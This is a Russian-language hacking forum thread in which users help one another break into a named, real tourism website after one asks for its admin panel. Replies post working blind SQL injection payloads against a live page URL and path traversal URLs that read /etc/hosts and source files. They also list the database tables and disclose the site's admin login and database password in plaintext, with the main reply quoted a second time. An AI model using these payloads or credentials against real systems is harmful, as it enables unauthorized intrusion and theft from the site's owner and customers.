http://www.onlytourism.com/ помогите найти админку, буду благодарен.

админку не получилось, но можем вот так

cpanel.onlytourism.com

webdisk.onlytourism.com

webmail.onlytourism.com

Не знаю насколько еще актуально, но пока Вот что удалось собрать:

.SpoilerTarget" type="button">Spoiler: phpinfo();


Code:
onlytourism.com/php.php


.SpoilerTarget" type="button">Spoiler: sql-injection


Code:
URL: onlytourism.com/tours-details.php?type=16&id=31&arrdate=23%2F08%2F2019&adults=3&children=2



Code:
Вектор:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=16&id=31' AND 2317=2317 AND 'TZhC'='TZhC&arrdate=23/08/2019&adults=3&children=2
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: type=16&id=31' AND SLEEP(5) AND 'RAuE'='RAuE&arrdate=23/08/2019&adults=3&children=2
---

Таблицы БД


Code:
Database: onlytour_naddaf
[46 tables]
+-----------------------------------------+
| onlytourism_admin |
| onlytourism_adsense |
| onlytourism_banners |
| onlytourism_bannersmid |
| onlytourism_bookpackages |
| onlytourism_booktour |
| onlytourism_bookvisa |
| onlytourism_category |
| onlytourism_categorychannel |
| onlytourism_categorydir |
| onlytourism_categoryhd |
| onlytourism_categoryphoto |
| onlytourism_cms |
| onlytourism_configurations |
| onlytourism_country |
| onlytourism_countryliving |
| onlytourism_downloads |
| onlytourism_gallery |
| onlytourism_gallery_images |
| onlytourism_news |
| onlytourism_news_admin |
| onlytourism_news_maillist_subscribers |
| onlytourism_news_newsletter |
| onlytourism_news_newsletter_attachments |
| onlytourism_news_newsletter_maillist |
| onlytourism_news_newsletter_templates |
| onlytourism_news_newslettersubscriber |
| onlytourism_packages |
| onlytourism_prod_images |
| onlytourism_prod_imagesdir |
| onlytourism_prod_imageshd |
| onlytourism_prod_price |
| onlytourism_prod_pricedir |
| onlytourism_prod_pricehd |
| onlytourism_products |
| onlytourism_products_catg |
| onlytourism_products_catgdir |
| onlytourism_products_catghd |
| onlytourism_productsdir |
| onlytourism_productshd |
| onlytourism_projectcat_images |
| onlytourism_projectcategory |
| onlytourism_services |
| onlytourism_testimonials |
| onlytourism_tours |
| onlytourism_vacancies |
+-----------------------------------------+

Данные администратора


Code:
Database: onlytour_naddaf
Table: onlytourism_admin
[1 entry]
+----+-------------+-------------+
| id | user | pwd |
+----+-------------+-------------+
| 1 | tourismcms | onlypass563 |
+----+-------------+-------------+


.SpoilerTarget" type="button">Spoiler: Скачивание файлов
/etc/hosts и путь к корневому index.php


Code:
onlytourism.com/download_file.php?fname=../../../../etc/hosts
onlytourism.com/download_file.php?fname=../../../../home/onlytour/public_html/index.php

Файлы которые удалось найти самому (чисто поверхностно):


Code:
/includes/analytics.php
/includes/banner-inner.php
/includes/footer.php
/includes/header.php
/includes/subscribe.php
/lib/adsense.php
/lib/application-footer.php
/lib/application-top.php
/lib/bannersmid.php
/lib/category.php
/lib/categorydir.php
/lib/categoryhd.php
/lib/class.phpmailer.php
/lib/cms.php
/lib/configurations.php
/lib/conmanager.php
/lib/connect.php
/lib/news.php
/lib/products.php
/lib/seourl.php
/pagination/pagination.class.php
/about.php
/blog.php
/booking-tour.php
/cms.php
/contact.php
/downloads.php
/download_file.php
/get-ajax.php
/holiday-packages.php
/index.php
/packages-details.php
/php.ini
/tours-details.php
/tours-search.php
/tours.php


.SpoilerTarget" type="button">Spoiler: Данные для коннекта к БД
Отрывок кода


PHP:
classMySqlConnectionManagerextendsConnectionManage r
{
functionMySqlConnectionManager()
{
$this->hostName="localhost";
$this->userName="onlytour_naddaft";
$this->passWord="QYi8Lug4swSEr5J";

}
functiondoConnection()
{
if(!($this->conHandle=mysql_connect($this->hostName,$this->userName,$this->passWord)))
{
die("Cannot Connect to Host");
}
}
functionselectDatabase()
{

mysql_select_db("onlytour_naddaf",$this->conHandle);
}
}



PS: Если найду админку обновлю пост, а так надеюсь данная информация посодействует в поисках

Groove said:
↑ (https://antichat.live/posts/4323090/)
http://www.onlytourism.com/
помогите найти админку, буду благодарен.




kacergei said:
↑ (https://antichat.live/posts/4325340/)
Не знаю насколько еще актуально, но пока Вот что удалось собрать:
Spoiler: phpinfo();

Code:
onlytourism.com/php.php

Spoiler: sql-injection

Code:
URL: onlytourism.com/tours-details.php?type=16&id=31&arrdate=23%2F08%2F2019&adults=3&children=2


Code:
Вектор:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=16&id=31' AND 2317=2317 AND 'TZhC'='TZhC&arrdate=23/08/2019&adults=3&children=2
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: type=16&id=31' AND SLEEP(5) AND 'RAuE'='RAuE&arrdate=23/08/2019&adults=3&children=2
---

Таблицы БД

Code:
Database: onlytour_naddaf
[46 tables]
+-----------------------------------------+
| onlytourism_admin |
| onlytourism_adsense |
| onlytourism_banners |
| onlytourism_bannersmid |
| onlytourism_bookpackages |
| onlytourism_booktour |
| onlytourism_bookvisa |
| onlytourism_category |
| onlytourism_categorychannel |
| onlytourism_categorydir |
| onlytourism_categoryhd |
| onlytourism_categoryphoto |
| onlytourism_cms |
| onlytourism_configurations |
| onlytourism_country |
| onlytourism_countryliving |
| onlytourism_downloads |
| onlytourism_gallery |
| onlytourism_gallery_images |
| onlytourism_news |
| onlytourism_news_admin |
| onlytourism_news_maillist_subscribers |
| onlytourism_news_newsletter |
| onlytourism_news_newsletter_attachments |
| onlytourism_news_newsletter_maillist |
| onlytourism_news_newsletter_templates |
| onlytourism_news_newslettersubscriber |
| onlytourism_packages |
| onlytourism_prod_images |
| onlytourism_prod_imagesdir |
| onlytourism_prod_imageshd |
| onlytourism_prod_price |
| onlytourism_prod_pricedir |
| onlytourism_prod_pricehd |
| onlytourism_products |
| onlytourism_products_catg |
| onlytourism_products_catgdir |
| onlytourism_products_catghd |
| onlytourism_productsdir |
| onlytourism_productshd |
| onlytourism_projectcat_images |
| onlytourism_projectcategory |
| onlytourism_services |
| onlytourism_testimonials |
| onlytourism_tours |
| onlytourism_vacancies |
+-----------------------------------------+

Данные администратора

Code:
Database: onlytour_naddaf
Table: onlytourism_admin
[1 entry]
+----+-------------+-------------+
| id | user | pwd |
+----+-------------+-------------+
| 1 | tourismcms | onlypass563 |
+----+-------------+-------------+

Spoiler: Скачивание файлов
/etc/hosts и путь к корневому index.php

Code:
onlytourism.com/download_file.php?fname=../../../../etc/hosts
onlytourism.com/download_file.php?fname=../../../../home/onlytour/public_html/index.php

Файлы которые удалось найти самому (чисто поверхностно):

Code:
/includes/analytics.php
/includes/banner-inner.php
/includes/footer.php
/includes/header.php
/includes/subscribe.php
/lib/adsense.php
/lib/application-footer.php
/lib/application-top.php
/lib/bannersmid.php
/lib/category.php
/lib/categorydir.php
/lib/categoryhd.php
/lib/class.phpmailer.php
/lib/cms.php
/lib/configurations.php
/lib/conmanager.php
/lib/connect.php
/lib/news.php
/lib/products.php
/lib/seourl.php
/pagination/pagination.class.php
/about.php
/blog.php
/booking-tour.php
/cms.php
/contact.php
/downloads.php
/download_file.php
/get-ajax.php
/holiday-packages.php
/index.php
/packages-details.php
/php.ini
/tours-details.php
/tours-search.php
/tours.php

Spoiler: Данные для коннекта к БД
Отрывок кода

PHP:
classMySqlConnectionManagerextendsConnectionManage r
{
functionMySqlConnectionManager()
{
$this->hostName="localhost";
$this->userName="onlytour_naddaft";
$this->passWord="QYi8Lug4swSEr5J";

}
functiondoConnection()
{
if(!($this->conHandle=mysql_connect($this->hostName,$this->userName,$this->passWord)))
{
die("Cannot Connect to Host");
}
}
functionselectDatabase()
{

mysql_select_db("onlytour_naddaf",$this->conHandle);
}
}


PS: Если найду админку обновлю пост, а так надеюсь данная информация посодействует в поисках


Как вариант поискать путь к админке к бд, посмотреть пути в файлам, инетерсно выглядят вот эти таблицы

onlytourism_cms

onlytourism_configurations